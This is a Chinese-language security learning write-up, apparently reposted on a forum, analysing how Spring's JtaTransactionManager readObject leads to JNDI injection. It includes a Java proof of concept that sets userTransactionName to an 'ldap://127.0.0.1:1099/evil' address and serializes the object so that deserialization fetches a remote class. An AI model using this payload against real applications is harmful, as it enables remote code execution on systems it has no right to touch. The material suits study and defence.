Spring反序列化JNDI分析
漏洞原理Spring框架的JtaTransactionManager类中重写了readObject方法,这个方法终极会调用到JNDI中的lookup()方法,关键是里面的参数可控,这就导致了攻击者可以使用JNDI注入中的lookup()参数注入,传入恶意URI地址指向攻击者的RMI注册表服务,以使受害者客户端加载绑定在攻击者RMI注册表服务上的恶意类,从而实现远程代码执行。
环境依赖
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-tx</artifactId>
<version>4.2.4.RELEASE</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-context</artifactId>
<version>4.2.4.RELEASE</version>
</dependency>
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>javax.transaction-api</artifactId>
<version>1.2</version>
</dependency>流程分析
漏洞入口在org/springframework/transaction/jta/JtaTransactionManager.java的readObject方法
https://img2024.cnblogs.com/blog/2746479/202404/2746479-20240406181431300-1798807052.png#height=192&id=rk6c6&originHeight=457&originWidth=1317&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=&width=554.7142944335938
跟进initUserTransactionAndTransactionManager
https://img2024.cnblogs.com/blog/2746479/202404/2746479-20240406181622349-1704377925.png#height=123&id=n8OmI&originHeight=305&originWidth=1383&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=&width=558.7142944335938
跟进lookupUserTransaction,这里调用了lookup
https://img2024.cnblogs.com/blog/2746479/202404/2746479-20240406181703994-980459123.png#height=190&id=zGKXw&originHeight=540&originWidth=1588&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=&width=557.7142944335938
跟进lookup方法
https://img2024.cnblogs.com/blog/2746479/202404/2746479-20240406182152477-27918315.png#height=161&id=hgun3&originHeight=375&originWidth=1298&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=&width=555.7142944335938
继承跟进lookup方法,这里调用的是ctx的lookup方法,ctx是一个Context类型,往后追踪ctx,发现ctx实在是InitialContext类的实例,以是这里我们控制name的值就能直接打JNDI注入了
https://img2024.cnblogs.com/blog/2746479/202404/2746479-20240406182259304-147015649.png#height=194&id=NuUiQ&originHeight=535&originWidth=1533&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=&width=555.7142944335938
name就是JtaTransactionManager的属性userTransactionName,我们可以反射修改它的值
package org.example;
import org.springframework.transaction.jta.JtaTransactionManager;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
public class Main {
public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
Field userTransactionName = JtaTransactionManager.class.getDeclaredField("userTransactionName");
userTransactionName.setAccessible(true);
userTransactionName.set(jtaTransactionManager, "ldap://127.0.0.1:1099/evil");
// 序列化
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("test.bin"));
oos.writeObject(jtaTransactionManager);
// 反序列化
byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\SpringJNDI\\test.bin"));
ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
ObjectInputStream obj = new ObjectInputStream(bis);
obj.readObject();
}
}成功注入
https://img2024.cnblogs.com/blog/2746479/202404/2746479-20240406184149816-1582311052.png#height=327&id=T0G21&originHeight=1134&originWidth=1883&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=&width=542.7142944335938
rmi也是同理,把ldap换成rmi就行了,至于恶意服务端怎么搭建,之前的文章有讲过,这里就不再复述
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]